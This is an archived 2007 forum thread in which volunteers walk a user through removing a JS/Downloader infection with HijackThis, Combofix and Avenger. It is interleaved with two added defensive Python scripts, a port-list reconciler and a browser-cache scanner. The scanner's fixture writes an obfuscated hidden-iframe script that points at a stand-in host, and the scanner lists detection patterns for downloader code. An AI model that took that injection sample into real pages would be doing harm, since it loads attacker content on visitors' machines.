TechSpot

JS/Downloader Virus infection

By bkirby43
Oct 9, 2007
  1. Hi,

    My name is Bill. I see where you have instructions for another to clean her computer of the JS/Downloader virus. I would like similar help in cleaning my computer of the same, please. Thanks.

    bkirby
     
  2. Rik

    Rik Banned Posts: 4,985

    Hi there bkirby43 and a big warm welcome to TechSpot!:)

    Below is the instruction set that will get you on the road to having a clean pc, please try to follow the instructions very closely and post here if you should run into any problems.

    You need to have a read of this - If your system is infected. Read this before deciding whether to CLEAN or REFORMAT.

    Then if you should wish to proceed with cleaning your system you need to go and read the Viruses/Spyware/Malware, preliminary removal instructions. Follow all the instructions exactly.

    Post fresh HJT, Combofix, and AVG Antispyware logs as ATTACHMENTS into this thread, only after doing the above.


    This thread is for the use of bkirby43 only. Please don't post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  3. bkirby43

    bkirby43 TS Rookie Topic Starter

    Thanks Rik. Here I go...
     
  4. Rik

    Rik Banned Posts: 4,985

    No problem.:)

    It is a time consuming process but it can make a huge difference.

    Once done, please make sure that you ATTACH all 3 of the logs mentioned in my first post so that we can be sure of getting all your problems fixed. Please do not cut and paste them, it makes analyzing them far more difficult for us.

     
  5. bkirby43

    bkirby43 TS Rookie Topic Starter

    Dear Rik:

    Here's my first report...did the Panda Antirootkit check and there were no known or unknown rootkits. Good news? I hope so.

    Back to work. Incidentally, I ran the Cleaner. It said all would be deleted. But when I ran the analyzer, something was there and it said nothing had been deleted yet! Is that correct?

    More reports coming...as soon as I can figure this all out!!

    Regards,

    bill
     
  6. Rik

    Rik Banned Posts: 4,985

    That's a good thing. :)

     
  7. Jase123

    Jase123 Banned Posts: 1,122

    Please post the fresh HJT, AVG Antispyware and Combofix logs as attachments.

    After all, you don't want people getting on to your system, do you?

    So it's best to be on the safe side and let one of us here check it over to make sure your system is clean. :)

    Regards Jase :)

     
  8. bkirby43

    bkirby43 TS Rookie Topic Starter

    Dear Gentlemen:

    Wow! What an exercise! But I do believe we've got it, I hope.

    I'm keeping my fingers crossed but I'm not experiencing the dreaded message saying that "JS/Downloader" is at it again. I kept getting the message as I accessed the net to reread your instructions until finally doing all the scans and fixes in safe mode. I noted that in the AVG Anti-spyware scan it deleted "BMC-adware," or something like that. Maybe that was the villain. Incidentally, I just started using Lime Wire to download music. Is that noted as a spyware carrier as one of my friends suggested? Who is this guy JS Downloader, anyway? I noticed from your forums I'm not the only one with this problem.

    Please have a look at my logs. I think I uploaded the proper ones.

    I hope this is it. Many thanks for all your help.

    Yours truly,

    Bill
     
  9. Rik

    Rik Banned Posts: 4,985

    I can't actually see any problems in your logs apart from 1 minor thing.

    Post an HJT log from normal mode just in case there is anything that won't show in safe mode.

     
  10. Jase123

    Jase123 Banned Posts: 1,122

    Be very careful with Limewire, as it is full of spyware.


    Your HJT log looks clean, but let Howard check it over first as I am still in training.

    Regards Jase :)

     
  11. bkirby43

    bkirby43 TS Rookie Topic Starter

    I'll run the HJT log in normal. But...I spoke too soon! It's still there, not as frequently, but still there. When I use IE, sometimes an AVG window pops up telling me JS/Downloader Agent is there when IE tries to access the Temp File.

    Gentlemen,

    Here's the HJT log from normal mode. I hope it sheds some light on the subject.

    Thanks again,

    Bill
     
     
  12. Jase123

    Jase123 Banned Posts: 1,122

  13. Rik

    Rik Banned Posts: 4,985

    Nope, that log is far from clean.

    In Windows Explorer, turn on "Show all files and folders, including hidden and system". See how here.> http://www.bleepingcomputer.com/forums/tutorial62.html

    Open your task manager, by holding down the ctrl and alt keys and pressing the delete key.

    Click on the processes tab and end process for(if there).

    Viewpoint
    Viewpoint Manager


    Close task manager.


    Go to add remove programmes in your control panel and uninstall anything to do with(if there).

    Viewpoint
    Viewpoint Manager


    Post a fresh HJT log from normal mode so that I can check if it has permanently gone.
     
  14. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 25,948   +19

    Hello and welcome to Techspot.

    Please do the following

    You might want to copy and paste these instructions into a notepad file. Then you can have the file open in safe mode, so you can follow the instructions easier.

    Boot into safe mode, under your normal user name(NOT THE ADMINISTRATOR ACCOUNT). See how HERE.

    In Windows Explorer, turn on "Show all files and folders, including hidden and system". See how HERE.

    Go to add remove programmes in your control panel and uninstall anything to do with(if there).

    Viewpoint
    viewpoint manager
    viewpoint toolbar

    Close control panel.

    Click start/run and type services.msc into the run box and press the enter key.

    When the window appears, maximise it. Double click on the following services(if there) and select stop if they are running. Set the startup type to disabled. Click apply/ok for each service you disable.

    Viewpoint Manager Service

    Close the services window.

    Run HJT with no other programmes open(except notepad). Click the scan button. Have HJT fix the following, by placing a tick in the little box next to(if there).

    O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe

    Click on the fix checked button.

    Close HJT.

    Locate and delete the following bold files and/or directories(if there).

    C:\Program Files\Viewpoint (delete the entire folder)

    Reboot into normal mode and rehide your protected OS files.

    Post a fresh HJT log and let us know if you`re still having problems.

    Regards Howard :wave: :wave:

     
  15. bkirby43

    bkirby43 TS Rookie Topic Starter

    Gentlemen:

    Thanks for all the help. I will do as you instructed.

    Here is the result of the latest Housecall scan:

    No malware/spyware found. There were vulnerabilities that needed to be fixed manually which I don't know how to do. Here they are:

    These ports are accessible:

    TCP.443
    TCP.80
    TCP.53
    TCP.25
    TCP.23
    TCP.22

    How should I proceed on this issue?

    Thanks,

    Bill
     
  16. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 25,948   +19

    Providing your firewall is running properly, you shouldn`t be too worried.

    Please post a fresh HJT log after following the instructions in my post above.

    Regards Howard :)
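The port list above is the external scanner's view of the machine; Howard's reply turns on whether the firewall is actually in front of those ports. As an added example, not part of this thread, the Python script below reconciles such a scanner list with what the host itself is listening on. It parses a constructed `netstat -ano` excerpt (Windows XP column layout is assumed; the sample lines are made up for illustration) and splits the scanner's ports into those the host really serves and those with no local listener, which usually means the scan hit something in front of the host (a router or the ISP) rather than the PC.

```python
"""Reconcile an external port-scan result with the host's own listening sockets.

Added example, not from the thread. SAMPLE_NETSTAT is a constructed excerpt of
'netstat -ano' output in Windows XP format; SCANNER_PORTS is the list posted
in the thread.
"""
import re

# Ports the external scan reported as "accessible" (from the thread).
SCANNER_PORTS = {443, 80, 53, 25, 23, 22}

# Constructed sample of 'netstat -ano' output, for illustration only.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:1025         0.0.0.0:0              LISTENING       1340
  TCP    192.168.1.10:1390      64.12.168.40:80        ESTABLISHED     2204
  UDP    0.0.0.0:445            *:*                                    4
"""

# One netstat row: proto, local addr:port, foreign addr:port, optional state, pid.
LINE_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<laddr>\S+):(?P<lport>\d+)\s+\S+\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s*$"
)


def listening_tcp_ports(netstat_text):
    """Return {port: (bind_address, pid)} for TCP sockets in LISTENING state."""
    result = {}
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("proto") != "TCP" or m.group("state") != "LISTENING":
            continue
        result[int(m.group("lport"))] = (m.group("laddr"), int(m.group("pid")))
    return result


def reconcile(scanner_ports, listening):
    """Split the scanner's list into ports this host serves and ports it does not.

    Returns (confirmed, not_local, exposed_elsewhere):
      confirmed        - scanner ports that really have a local listener, with PID
      not_local        - scanner ports with no local listener (scan hit something
                         in front of the host, or the firewall answered)
      exposed_elsewhere- sockets bound to all interfaces (0.0.0.0) that the scanner
                         did not report; these are the ones to check against the
                         firewall rules.
    """
    confirmed = {p: listening[p] for p in scanner_ports if p in listening}
    not_local = sorted(p for p in scanner_ports if p not in listening)
    exposed_elsewhere = sorted(
        p for p, (addr, _) in listening.items()
        if addr == "0.0.0.0" and p not in scanner_ports
    )
    return confirmed, not_local, exposed_elsewhere


if __name__ == "__main__":
    listening = listening_tcp_ports(SAMPLE_NETSTAT)
    confirmed, not_local, exposed = reconcile(SCANNER_PORTS, listening)
    print("scanner ports served by this host:", confirmed)
    print("scanner ports with no local listener:", not_local)
    print("0.0.0.0 listeners the scanner did not list:", exposed)
```

On a real machine, feed the script the output of `netstat -ano` run as an administrator so the PID column is populated, then map each PID to its executable in Task Manager; a listener on 0.0.0.0 that you cannot account for is worth more attention than a scanner verdict on ports nothing is bound to.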
     
  17. bkirby43

    bkirby43 TS Rookie Topic Starter

    Gentlemen:

    Here's the HJT log after following the instructions above. In that process I did remove Viewpoint Manager and Viewpoint Media Player in the ADD/REMOVE panel. When I ran HJT in safe mode with all files displayed, O23 - Viewpoint was not there to be fixed. Running Task Manager there was no Viewpoint to stop. I could not find a Viewpoint file in the Program Files after it was removed in the add/remove process. Finally, I cruised the net briefly before posting this and did not get the dreaded JS/Downloader message. But it has happened before that this guy takes a short recess before resuming his dirty tricks! I'll keep my fingers crossed.

    Yours truly,

    Bill from Bombay
     
  18. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 25,948   +19

    Your HJT log is now clean.

    Turn off system restore.(XP/ME only) See how HERE.

    Now, turn system restore back on. This will have deleted all your old restore points and any nasties that are in them. It will also have created a new, clean restore point.


    If you have any further virus/spyware problems, please post in this thread.

    Regards Howard :)

     
  19. bkirby43

    bkirby43 TS Rookie Topic Starter

    Gentlemen:

    I'm going to keep my fingers crossed that this guy, JS/Downloader, never resurfaces again. I can't thank your team enough. I didn't want to have to reformat.

    I would like a little advice. I now have ZoneAlarm, AVG AntiVirus (free) and AVG AntiSpyware (free) on and working on my computer. I don't mind buying the full version of each. Do I need to or is what I have adequate?

    Thanks again!

    Yours truly,

    Bill
     
  20. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 25,948   +19

    What you have is plenty good enough. Once the trial of AVG Antispyware ends, it will still carry on working and can still be updated etc. You just lose one or two features, that's all.

    Regards Howard :)

     
  21. bkirby43

    bkirby43 TS Rookie Topic Starter

    That little bugger is back. I worked the net for about an hour, to see if he'd come back, and sure enough, he's back! It took a little while, but he came back. Here's the latest log.
     
  22. Rik

    Rik Banned Posts: 4,985

    Please describe your symptoms exactly.

    Also, can you please provide a combofix log as whatever is infecting your system is not showing its ugly head in your HJT log.

     
  23. bkirby43

    bkirby43 TS Rookie Topic Starter

    Here's the Combofix log.

    My symptom is that an AVG Window pops up now and then saying:

    "Virus found JS/Downloader.Agent"

    Then it goes on to say:

    C:\Documents and Settings\Bill\Local Settings\Temporary Internet Files\Content.IE5\EPRD26R7\Main[1].js

    The last part may be different each time.

    AVG can't fix or delete it, but only put it in the vault. Strange?

    Regards,

    Bill
     
  24. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 25,948   +19

    Run Ccleaner as per step 9 of the instructions HERE.

    In Firefox, click Tools/clear private data/clear private data now.

    In IE, click Tools/internet options/delete cookies/ok/delete files/delete off line content/ok/clear history/yes. Click ok and close IE.

    Go to your control panel and double click the Java icon. Click the Update tab and click update now. Once the updates have been downloaded and installed, close Java. Go to add remove programmes and uninstall all versions of Java, except for the latest version which is version 6 update 3.

    1. Please download The Avenger by Swandog46 from HERE. Save it to your Desktop and extract it.

    2. Download the attached avengerscript.txt and save it to your desktop

    Note: the above code was created specifically for this user. If you are not this user, do NOT follow these directions as they could damage the workings of your system.

    3. Now, start The Avenger program by double clicking on its icon on your desktop.

    Under "Script file to execute" choose "Load script from file".
    Now click on the folder icon which will open a new window titled "open Script File"
    navigate to the file you have just downloaded, click on it and press open
    Now click on the Green Light to begin execution of the script
    Answer "Yes" twice when prompted.

    4. The Avenger will automatically do the following:

    It will Restart your computer. ( In cases where the code to execute contains "Drivers to Unload", The Avenger will actually restart your system twice.)
    On reboot, it will briefly open a black command window on your desktop, this is normal.
    After the restart, it creates a log file that should open with the results of Avenger’s actions. This log file will be located at C:\avenger.txt
    The Avenger will also have backed up all the files, etc., that you asked it to delete, and will have zipped them and moved the zip archives to C:\avenger\backup.zip.

    5. Please attach the content of c:\avenger.txt into your reply.

    Let us know if you're still having problems.

    Regards Howard :)

     
  25. bkirby43

    bkirby43 TS Rookie Topic Starter

    Gentlemen:

    Here's the Avenger report. I noticed it was programmed to find that specific file I mentioned in a previous report. First, each time AVG captures JS/Downloader.Agent, it's a new file path: C:\documents and settings\bill\local settings\temporary internet files\content.IE5\ is always the same. But it's the last part that changes with each occurrence. In the case I cited it was EPRD26R7\Main[1].js. But each successive appearance will have a new ending. Sorry, I should have been more clear on that.

    Here's what happened yesterday in my IE use. Last night I spent a lot of time just going from one site to another to see if site selection had anything to do with this bugger. I was JS/Downloader free the whole day. This morning I go to AOL to check my mail and that little rascal tried to GET OUT several times. It's as if he's been programmed to lie low for a while and then pop up and sneak out when you least expect it. However, each time AVG catches him and I put him in the vault and then empty it. Ever since I loaded Zone Alarm there have been 70 something attempts by this guy to get out and only 2 attempts by somebody to get into my computer. All have been rejected by ZoneAlarm. Yippy!

    So...that's it in a nutshell. He's still here. Incidentally, why is he in TempInternetFile content.IE5 when I'm using something newer?

    Yours truly,

    Bill
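The path AVG reports changes with every hit because Content.IE5 stores cached pages in randomly named subfolders; what stays constant is the kind of content being cached. As an added example, not from the thread, from AVG or from any of the tools mentioned, here is a Python scanner that walks a Content.IE5-style tree, decodes any `unescape("...")` string literals the way the browser would before writing them into the page, and reports cached `.js` files matching a few patterns typical of obfuscated downloader scripts. The folder names, file names and script contents it builds are constructed for this example; the one real-looking path (`EPRD26R7\Main[1].js`) is borrowed from the thread and the host in the sample is a placeholder.

```python
"""Scan an IE-style 'Temporary Internet Files\\Content.IE5' tree for cached
scripts that look like downloaders.

Added example, not from the thread. build_sample_cache() constructs a
throwaway tree with one benign and one suspicious script; the subfolder
names, file contents and the bad.example.invalid host are made up here.
"""
import hashlib
import os
import re
import shutil
import tempfile
from urllib.parse import unquote

# Patterns typical of obfuscated downloader scripts of that era: decoding a
# packed string and feeding it to eval/document.write, long fromCharCode
# sequences, or injecting a zero-size or hidden iframe.
RULES = {
    "eval_unescape":  re.compile(r"eval\s*\(\s*unescape\s*\(", re.I),
    "write_unescape": re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
    "fromcharcode":   re.compile(r"String\.fromCharCode\s*\((?:\s*\d+\s*,){20,}", re.I),
    "hidden_iframe":  re.compile(
        r"<iframe[^>]*(?:width\s*=\s*[\"']?0|height\s*=\s*[\"']?0|visibility\s*:\s*hidden)",
        re.I),
}

# A JavaScript unescape("...") literal; its argument is decoded and scanned too.
UNESCAPE_ARG = re.compile(r"unescape\s*\(\s*[\"']([^\"']+)[\"']\s*\)", re.I)


def _layers(text):
    """Yield the raw script, then one decoded layer per unescape("...") literal,
    so the rules also see what the script would write into the page.
    (unquote handles %XX only; JavaScript's %uXXXX form is left as-is.)"""
    yield text
    for m in UNESCAPE_ARG.finditer(text):
        yield unquote(m.group(1))


def scan_cache(root):
    """Walk `root` (the Content.IE5 directory) and return a sorted list of
    (path relative to root, sha1 hex digest, sorted rule names) for every
    cached .js file that matches at least one rule in any decoded layer."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".js"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                data = fh.read()
            # latin-1 never fails to decode, so a cached file in an odd
            # encoding is still scanned rather than skipped.
            text = data.decode("latin-1")
            hits = sorted(k for k, rx in RULES.items()
                          if any(rx.search(layer) for layer in _layers(text)))
            if hits:
                findings.append((os.path.relpath(full, root),
                                 hashlib.sha1(data).hexdigest(), hits))
    return sorted(findings)


def build_sample_cache():
    """Create a temporary Content.IE5-like tree (constructed sample data) and
    return its root path. Caller is responsible for removing it."""
    root = tempfile.mkdtemp(prefix="Content.IE5_")
    benign_dir = os.path.join(root, "A1B2C3D4")
    bad_dir = os.path.join(root, "EPRD26R7")
    os.makedirs(benign_dir)
    os.makedirs(bad_dir)
    with open(os.path.join(benign_dir, "menu[1].js"), "w") as fh:
        fh.write("function toggle(id){var e=document.getElementById(id);"
                 "e.style.display=e.style.display=='none'?'':'none';}\n")
    with open(os.path.join(bad_dir, "Main[1].js"), "w") as fh:
        # Decodes to: <iframe src="http://bad.example.invalid/x.php" width=0 height=0></iframe>
        fh.write('document.write(unescape("%3Ciframe%20src%3D%22http%3A//bad.example.invalid/x.php%22'
                 '%20width%3D0%20height%3D0%3E%3C/iframe%3E"));\n')
    return root


if __name__ == "__main__":
    root = build_sample_cache()
    try:
        for rel, digest, hits in scan_cache(root):
            print(rel, digest, ",".join(hits))
    finally:
        shutil.rmtree(root)
```

Run against a real profile, point `scan_cache` at the user's `Local Settings\Temporary Internet Files\Content.IE5` folder (with hidden and system files visible, as the thread instructs). The sha1 column is what makes repeat hits comparable: the same script cached under a new random folder name has the same digest, while a different digest each time points at the site serving it, not the PC.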
     
Topic Status:
Not open for further replies.